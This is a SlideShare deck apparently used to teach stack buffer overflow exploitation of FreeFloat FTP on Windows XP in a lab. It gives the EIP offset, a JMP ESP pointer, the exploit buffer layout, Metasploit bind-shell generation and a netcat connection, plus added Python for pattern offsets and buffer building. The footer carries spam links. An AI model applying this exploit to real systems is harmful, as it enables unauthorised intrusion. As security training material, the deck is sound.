Dive into exploit development with Immunity Debugger, Mona.py and Metasploit
Mohsen Ahmadi
Disclaimer
If you’re someone that wants to
build exploits to partake in illegal
or immoral activity, please go
elsewhere
Introduction to Exploit
Development
Explore some basic ideas behind exploits
How we can execute our shellcodes
Each part contains a technique for successfully
exploiting a program in the wild
We’ll cover everything from SRP to ROP
Preparing our laboratory in
Virtual Machine
Immunity Debugger
Mona.py
Pvefindaddr.py
Metasploit Framework
Virtualization Software
Immunity Debugger (cont)
A powerful new way to write exploits, analyze malware, and
reverse engineer binary files
Immunity Debugger is similar to OllyDbg but it has Python
support
Cuts exploit development time by 50%
Connectivity to fuzzers and exploit development tools
http://debugger.immunityinc.com/ID_register.py
Features
Remote command bar
Python Scripting
Built in Graphing
Immunity Debugger is light
Immunity Debugger exposes the information you
need
Mona.py (cont)
 Mona.py is a plug-in for Immunity Debugger developed by the
Corelan Team
 Mona requires a small amount of configuration before you can
start using it
 Human error rates are high when dealing with binary and hex
 Mona can scan data for patterns much faster and more accurately
than we can
 Mona can even build ROP structures
Set of commands supported by Mona
Mona lisa
We’ll talk about how to configure and work with Mona in later slides!
Pvefindaddr.py
In short, !pvefindaddr is a PyCommand for Immunity Debugger
made by corelanc0d3r which can do almost everything (if not
everything) that you would need when building an exploit
Metasploit Framework
Generating our desired shellcodes
Escaping bad characters with msfencode
Receiving any connection back to our computer
Try to use Kali Linux, which fulfills your needs
Virtualization Software
X86 CPU registers (cont)
 EAX - Main register used in arithmetic calculations. Also known as the accumulator, as it holds
results of arithmetic operations and function return values.
 EBX - The Base Register. Pointer to data in the DS segment. Used to store the base address of
the program.
 ECX - The Counter register is often used to hold a value representing the number of times a
process is to be repeated. Used for loop and string operations.
 EDX - A general-purpose register. Also used for I/O operations. Helps extend EAX to 64 bits.
 ESI - Source Index register. Pointer to data in the segment pointed to by the DS register. Used
as an offset address in string and array operations. It holds the address from where to read
data.
X86 CPU registers
 EBP - Base Pointer. Pointer to data on the stack (in the SS segment). It points to the
bottom of the current stack frame. It is used to reference local variables.
 ESP - Stack Pointer (in the SS segment). It points to the top of the current stack
frame. It is used to reference local variables.
 EIP - Instruction Pointer (holds the address of the next instruction to be executed)
 EDI - Destination Index register. Pointer to data (or destination) in the segment
pointed to by the ES register. Used as an offset address in string and array
operations. It holds the implied write address of all string operations.
BOF
Buffer overflow: a memory location receives more
data than it was meant to
Stack overflow: usually a Buffer Overflow that writes
over Stack segment beyond the end of the stack
Look for?!!
our buffer needs to overwrite EIP
one of the CPU registers needs to contain our buffer
How does it work?
1) We send an overly long string to our program
2) This string overwrites EIP and part of it is stored in a CPU register
3) We find a pointer that points to the register that contains our buffer
4) We put that pointer in the correct place in our buffer so it overwrites
EIP
5) When the program reaches our pointer it executes the instruction
and jumps to the register that contains our buffer
Finally we place our shellcode in the part of the
buffer that is stored in the CPU register!
First scenario
 Exploit Development: Kali Linux
 Debugging Machine: Windows XP PRO SP3
 Vulnerable Software: FreeFloat FTP
 Write simple BOF exploit from scratch
Direct EIP overwrite
For the first tutorial we’ll just rely on “\x00\x0A\x0D” as
bad characters
Getting started with Immunity
Debugger
 Starting the Debugger
 Opening and attaching to the debugging target
application
 CPU window
 Registers window
I’ll explain each part separately
Starting the Debugger
 Before starting, you need to ensure that you are
using an account that has the appropriate
privileges, generally local Administrator
equivalent
 “Run as administrator”
Opening and Attaching to the
debugging target application
 By opening the target executable from disk
using the File->Open menu option
 By attaching to an already running program
using the File->Attach menu option
opening the target
executable from disk
Attach to the target
CPU window
 The actual instructions of the program we are about to run
 I will be referring to this as the CPU instruction or
disassembler pane
 Memory address
 Opcode
 X86 MASM syntax
Alt+C
Registers / flags window
 These registers are small storage areas within the CPU
itself, and they are used to facilitate various operations
that are performed within the X86 assembly language
Memory dump pane
Stack pane
Open program
 First open the FreeFloat FTP server
 When the service is up, check the state of
connections on your target machine
Attach to process
Replicate the crash (cont)
 Create a POC skeleton exploit to crash the
FTP server
 The FTP server comes with a built-in anonymous
user account
 MKD ~ make directory
The FTP port is 21
POC!
 Send your POC payload to the server
 Check whether EIP is overwritten with “\x41”
 Which registers contain part of our buffer?
 Try to find out which register contains the larger
chunk of our data
“\x41” ~ “A”
Registers
EIP overwritten; EDI and ESP contain part of our buffer
Metasploit pattern
 We now need to determine the correct offset in
order to get code execution
 pattern_create.rb
 The script will generate a string composed of
unique patterns that we can use to replace our
sequence of 'A's
Pay attention that you keep the original buffer length, since a
varying buffer length may change the program crash
Again replicate your crash (cont)
 Send your payload to the FTP service and check the EIP value,
which is overwritten by the Metasploit pattern
Check EIP!
 Find the offset at which EIP is overwritten by our pattern
 !mona comes into play
Configure !mona
 Download Mona and copy it to the PyCommands directory of
Immunity Debugger
 Use the following command to configure mona
 %p based on process name
 %i based on process id
Find cyclic pattern with !mona
 !mona findmsp
 From the analysis we can see that EIP is overwritten by the
4 bytes which directly follow the initial 247 bytes of
our buffer
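The cyclic pattern and offset lookup described on the last two slides, as an added example; it is not the deck's code, nor Metasploit's pattern_create.rb / pattern_offset.rb, nor mona's findmsp, but a from-scratch version of the same unique-triplet idea. It generalizes the 247-byte case: a generator for any length, the little-endian decode of the EIP value as the debugger displays it, and the split into filler, pointer and remainder that yields the deck's 247 + 4 + 749. The EIP value 69413269 in the demo is what the pattern arithmetic predicts at offset 247 (computed here, not quoted from the deck's screenshot).

```python
"""Cyclic pattern generation and EIP offset lookup.

Added example, not code from the deck and not Metasploit's pattern_create.rb /
pattern_offset.rb or mona's findmsp: a from-scratch version of the same
unique-triplet idea so the offset arithmetic is visible.
"""
import string
import struct

MAX_PATTERN = 26 * 26 * 10 * 3   # 20280 bytes before triplets would repeat


def pattern_create(length: int) -> str:
    """Build a string of non-repeating Upper/lower/digit triplets: Aa0Aa1...Ab0..."""
    if length > MAX_PATTERN:
        raise ValueError(f"length {length} exceeds the {MAX_PATTERN}-byte unique space")
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def eip_to_chunk(eip_hex: str) -> str:
    """Turn the EIP value as the debugger shows it (e.g. '69413269') into the
    four pattern characters that sat on the stack. x86 is little-endian, so
    the register reads the bytes in reverse memory order; packing the dword
    back with '<I' restores the memory order."""
    dword = int(eip_hex, 16)
    return struct.pack("<I", dword).decode("latin-1")  # never fails on odd bytes


def pattern_offset(pattern: str, chunk: str) -> int:
    """Offset of a 4-character chunk in the pattern, or -1 if it is not there
    (e.g. EIP still holds 'AAAA' or garbage, so the pattern never reached it)."""
    return pattern.find(chunk)


def find_offset_from_eip(pattern: str, eip_hex: str) -> int:
    """What !mona findmsp reports for EIP: the distance to the overwrite."""
    return pattern_offset(pattern, eip_to_chunk(eip_hex))


def layout(total_len: int, offset: int, ptr_len: int = 4) -> tuple:
    """Split a crash-length buffer into filler, pointer and remainder sizes."""
    return offset, ptr_len, total_len - offset - ptr_len


if __name__ == "__main__":
    pattern = pattern_create(1000)            # same length as the original crash
    # 0x69413269 is the value the pattern arithmetic predicts at offset 247;
    # it is derived here, not quoted from the deck.
    off = find_offset_from_eip(pattern, "69413269")
    print(off, layout(1000, off))             # 247 (247, 4, 749)
```

Keeping the pattern at the same length as the crash buffer matters, as the slide says: a different length can move the crash, and then the chunk in EIP may not be in the pattern at all, which is the -1 case handled above.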
Egg hunter
(figure: limited buffer space + shellcode = broken shellcode)
Check again
 Now our buffer should look like this:
 Buffer = "A"*247 + "B"*4 + "C"*749
 “B” ~ “\x42”
Replace “B”s with pointer to ESP
 We can replace those B's with a pointer that
redirects execution flow to ESP
 Keep in mind that our pointer can't contain
any bad characters
Do you remember bad characters?
“\x00\x0A\x0D”
JMP ESP
 To find a valid pointer which redirects us to ESP we
can use mona with the following command
 !mona jmp -r esp
Endian order of the X86 processor
(figure: the register value CEFAEDFE written to memory at addresses 0x0 to 0x3, low addresses first)
Big Endian (others): 0x0 = CE, 0x1 = FA, 0x2 = ED, 0x3 = FE
Little Endian (Intel): 0x0 = FE, 0x1 = ED, 0x2 = FA, 0x3 = CE
Msvcrt.dll (MS12-013)
 Starting from Visual Studio 2003, any program that
is dynamically linked to the C Run-Time library will
use msvcrXX.dll instead of msvcrt.dll
 If your program is statically linked with this Visual C
run-time library, your program is safe
 %windir%\system32
Our pointer to JMP ESP
 0x77c35459 : push esp # ret [msvcrt.dll]
 C:\WINDOWS\system32\msvcrt.dll
 Put a breakpoint on our pointer (F2)
Put our shellcode into the buffer
 Insert our payload in the part of the buffer that is
now made up of C's
 We would like to have the buffer length modified
dynamically
 Insert some NOPs (No Operation Performed = \x90)
before our payload as padding
buffer = "A"*247 + "\x59\x54\xC3\x77" + "\x90"*20 + shellcode + "C"*(749-(len(shellcode)+20))
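The three checks that the last few slides imply (the endianness of the pointer, the bad characters, and the buffer length staying at 1000 bytes), as an added example that is not the deck's code: it packs the 0x77c35459 pointer from the msvcrt.dll slide into little-endian order with struct, scans pointer and payload for \x00\x0A\x0D, and refuses to build a buffer whose NOP sled plus payload would no longer fit in the 749-byte tail. The payload used in the demo is a constructed stand-in of int3 bytes, not a real shellcode, and the address 0x7C0A0D00 is a constructed value chosen only because it contains all three bad bytes.

```python
"""Little-endian pointer packing, bad-character scan and buffer layout check.

Added example, not code from the deck: it reproduces the arithmetic of the
deck's one-line buffer and adds the checks worth running before a send.
"""
import struct

BAD_CHARS = b"\x00\x0a\x0d"   # the three bad characters the deck assumes
JMP_ESP_PTR = 0x77C35459      # push esp # ret in msvcrt.dll (from the deck)
OFFSET = 247                  # bytes before EIP, found with !mona findmsp
TOTAL_LEN = 1000              # 247 + 4 + 749: keep the crash-time length


def pack_pointer(addr: int) -> bytes:
    """Serialise a 32-bit address in little-endian order, as x86 stores it.
    0x77C35459 becomes 59 54 C3 77, the byte string the deck inserts."""
    return struct.pack("<I", addr)


def find_bad_chars(data: bytes, bad: bytes = BAD_CHARS) -> list:
    """Return (index, value) pairs for every bad byte found in data."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def shellcode_fits(shellcode_len: int, nop_count: int = 20,
                   offset: int = OFFSET, total: int = TOTAL_LEN) -> bool:
    """True when offset + pointer + NOPs + shellcode still fit in total bytes."""
    tail = total - offset - 4          # 749 in the deck's layout
    return nop_count + shellcode_len <= tail


def build_buffer(shellcode: bytes, nop_count: int = 20, offset: int = OFFSET,
                 ptr: int = JMP_ESP_PTR, total: int = TOTAL_LEN) -> bytes:
    """Same layout as the deck: filler, pointer, NOP sled, shellcode, padding.
    Refuses to build when a bad byte is present or the shellcode cannot fit,
    because either one silently breaks the result (a truncated pointer or a
    buffer whose length no longer matches the crash)."""
    ptr_bytes = pack_pointer(ptr)
    bad = find_bad_chars(ptr_bytes) + find_bad_chars(shellcode)
    if bad:
        raise ValueError(f"bad characters at (index, byte): {bad}")
    if not shellcode_fits(len(shellcode), nop_count, offset, total):
        raise ValueError("shellcode plus NOP sled does not fit in the buffer")
    padding = total - offset - len(ptr_bytes) - nop_count - len(shellcode)
    buf = b"A" * offset + ptr_bytes + b"\x90" * nop_count + shellcode + b"C" * padding
    assert len(buf) == total   # the length must not drift from the crash case
    return buf


if __name__ == "__main__":
    # Stand-in "shellcode": int3 breakpoints (constructed, not a real payload),
    # handy for confirming in the debugger that execution reached the sled.
    stand_in = b"\xcc" * 32
    buf = build_buffer(stand_in)
    print(len(buf), pack_pointer(JMP_ESP_PTR).hex())
    # A constructed address holding all three bad bytes is rejected:
    print(find_bad_chars(pack_pointer(0x7C0A0D00)))
```

The int3 stand-in is a common debugging step: with the breakpoint on the pointer set as the slide suggests, hitting the sled and then an int3 confirms the flow reached the buffer before any real payload is involved.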
Generate our shellcode with
msfpayload (cont)
 msfpayload -l | grep windows
 Metasploit has a command-line shellcode
generation function called msfpayload
 To use msfpayload, you need to know the options
associated with each payload
Msfpayload -O
Shell_bind_tcp
Msfencode | bad character escaping
 Encode your exploit to prevent broken shellcode
Check netstat before & after POC!
 If our payload works without raising any error, it will
spawn a shell for us on port 3320
:D let’s check it with NetCat
Game over!
 nc -nvv 192.168.149.153 3320
 v: verbose mode
 n: use IP only, don’t resolve DNS
Hopefully you now understand the basics of a stack-based
buffer overflow
OS DLL or application
 If you choose an OS DLL, your exploit isn't portable, because
these DLLs are not the same across Windows versions
 These DLLs are not randomized on XP but they are on
Windows 7
 If your application moves between operating system
versions, you're still going to be referencing a JMP ESP
within the application itself, and not be OS dependent
Any questions?!
Thank you

More Related Content

What's hot

OTP application (with gen server child) - simple example
OTP application (with gen server child) - simple exampleOTP application (with gen server child) - simple example
OTP application (with gen server child) - simple exampleYangJerng Hwa
 
Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesEran Goldstein
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacksJapneet Singh
 
Anatomy of a Buffer Overflow Attack
Anatomy of a Buffer Overflow AttackAnatomy of a Buffer Overflow Attack
Anatomy of a Buffer Overflow AttackRob Gillen
 
CNIT 127: 4: Format string bugs
CNIT 127: 4: Format string bugsCNIT 127: 4: Format string bugs
CNIT 127: 4: Format string bugsSam Bowne
 
Buffer overflow explained
Buffer overflow explainedBuffer overflow explained
Buffer overflow explainedTeja Babu
 
Concurrency in Elixir with OTP
Concurrency in Elixir with OTPConcurrency in Elixir with OTP
Concurrency in Elixir with OTPJustin Reese
 
CNIT 126 13: Data Encoding
CNIT 126 13: Data EncodingCNIT 126 13: Data Encoding
CNIT 126 13: Data EncodingSam Bowne
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Elvin Gentiles
 
Seh based attack
Seh based attackSeh based attack
Seh based attackMihir Shah
 
Gift-VT Tools Development Overview
Gift-VT Tools Development OverviewGift-VT Tools Development Overview
Gift-VT Tools Development Overviewstn_tkiller
 
Analytics tools and Instruments
Analytics tools and InstrumentsAnalytics tools and Instruments
Analytics tools and InstrumentsKrunal Soni
 
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointSource Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointTyler Shields
 
CNIT 127: Ch 18: Source Code Auditing
CNIT 127: Ch 18: Source Code AuditingCNIT 127: Ch 18: Source Code Auditing
CNIT 127: Ch 18: Source Code AuditingSam Bowne
 
Using OTP and gen_server Effectively
Using OTP and gen_server EffectivelyUsing OTP and gen_server Effectively
Using OTP and gen_server EffectivelyKen Pratt
 
Advanced malware analysis training session5 reversing automation
Advanced malware analysis training session5 reversing automationAdvanced malware analysis training session5 reversing automation
Advanced malware analysis training session5 reversing automationCysinfo Cyber Security Community
 
Planet of the AOPs
Planet of the AOPsPlanet of the AOPs
Planet of the AOPsJames Ward
 

What's hot (20)

OTP application (with gen server child) - simple example
OTP application (with gen server child) - simple exampleOTP application (with gen server child) - simple example
OTP application (with gen server child) - simple example
 
Tranning-2
Tranning-2Tranning-2
Tranning-2
 
Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniques
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 
Anatomy of a Buffer Overflow Attack
Anatomy of a Buffer Overflow AttackAnatomy of a Buffer Overflow Attack
Anatomy of a Buffer Overflow Attack
 
CNIT 127: 4: Format string bugs
CNIT 127: 4: Format string bugsCNIT 127: 4: Format string bugs
CNIT 127: 4: Format string bugs
 
Buffer overflow explained
Buffer overflow explainedBuffer overflow explained
Buffer overflow explained
 
Concurrency in Elixir with OTP
Concurrency in Elixir with OTPConcurrency in Elixir with OTP
Concurrency in Elixir with OTP
 
CNIT 126 13: Data Encoding
CNIT 126 13: Data EncodingCNIT 126 13: Data Encoding
CNIT 126 13: Data Encoding
 
Python Basics
Python BasicsPython Basics
Python Basics
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
 
Seh based attack
Seh based attackSeh based attack
Seh based attack
 
Gift-VT Tools Development Overview
Gift-VT Tools Development OverviewGift-VT Tools Development Overview
Gift-VT Tools Development Overview
 
Analytics tools and Instruments
Analytics tools and InstrumentsAnalytics tools and Instruments
Analytics tools and Instruments
 
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointSource Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
 
CNIT 127: Ch 18: Source Code Auditing
CNIT 127: Ch 18: Source Code AuditingCNIT 127: Ch 18: Source Code Auditing
CNIT 127: Ch 18: Source Code Auditing
 
OIVM
OIVMOIVM
OIVM
 
Using OTP and gen_server Effectively
Using OTP and gen_server EffectivelyUsing OTP and gen_server Effectively
Using OTP and gen_server Effectively
 
Advanced malware analysis training session5 reversing automation
Advanced malware analysis training session5 reversing automationAdvanced malware analysis training session5 reversing automation
Advanced malware analysis training session5 reversing automation
 
Planet of the AOPs
Planet of the AOPsPlanet of the AOPs
Planet of the AOPs
 

Similar to Dive into exploit development with Immunity Debugger, Mona.py and Metasploit

Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackTomer Zait
 
Introduction to Assembly Language Programming
Introduction to Assembly Language ProgrammingIntroduction to Assembly Language Programming
Introduction to Assembly Language ProgrammingRahul P
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackironSource
 
Buffer overflow tutorial
Buffer overflow tutorialBuffer overflow tutorial
Buffer overflow tutorialhughpearse
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploitshughpearse
 
Assembly level language
Assembly level languageAssembly level language
Assembly level languagePDFSHARE
 
Buffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredBuffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredKory Kyzar
 
NASM Introduction.pptx
NASM Introduction.pptxNASM Introduction.pptx
NASM Introduction.pptxAnshKarwa
 
My cool new Slideshow!
My cool new Slideshow!My cool new Slideshow!
My cool new Slideshow!manishamorya
 
Malware Analysis - x86 Disassembly
Malware Analysis - x86 DisassemblyMalware Analysis - x86 Disassembly
Malware Analysis - x86 DisassemblyNatraj G
 
Ceh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowCeh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowVi Tính Hoàng Nam
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsAjin Abraham
 
Pascal script maxbox_ekon_14_2
Pascal script maxbox_ekon_14_2Pascal script maxbox_ekon_14_2
Pascal script maxbox_ekon_14_2Max Kleiner
 
Os Worthington
Os WorthingtonOs Worthington
Os Worthingtonoscon2007
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick reviewCe.Se.N.A. Security
 

Similar to Dive into exploit development with Immunity Debugger, Mona.py and Metasploit (20)

Exploitation Crash Course
Exploitation Crash CourseExploitation Crash Course
Exploitation Crash Course
 
Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The Stack
 
Introduction to Assembly Language Programming
Introduction to Assembly Language ProgrammingIntroduction to Assembly Language Programming
Introduction to Assembly Language Programming
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the Stack
 
Buffer overflow tutorial
Buffer overflow tutorialBuffer overflow tutorial
Buffer overflow tutorial
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
 
Assembly level language
Assembly level languageAssembly level language
Assembly level language
 
Buffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredBuffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly Required
 
NASM Introduction.pptx
NASM Introduction.pptxNASM Introduction.pptx
NASM Introduction.pptx
 
My cool new Slideshow!
My cool new Slideshow!My cool new Slideshow!
My cool new Slideshow!
 
Malware Analysis - x86 Disassembly
Malware Analysis - x86 DisassemblyMalware Analysis - x86 Disassembly
Malware Analysis - x86 Disassembly
 
Ceh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowCeh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflow
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
 
Pascal script maxbox_ekon_14_2
Pascal script maxbox_ekon_14_2Pascal script maxbox_ekon_14_2
Pascal script maxbox_ekon_14_2
 
Design
DesignDesign
Design
 
Os Worthington
Os WorthingtonOs Worthington
Os Worthington
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick review
 
fg.workshop: Software vulnerability
fg.workshop: Software vulnerabilityfg.workshop: Software vulnerability
fg.workshop: Software vulnerability
 
Chapter1.pdf
Chapter1.pdfChapter1.pdf
Chapter1.pdf
 
C programming session10
C programming  session10C programming  session10
C programming session10
 

Recently uploaded

WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 

Recently uploaded (20)

WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
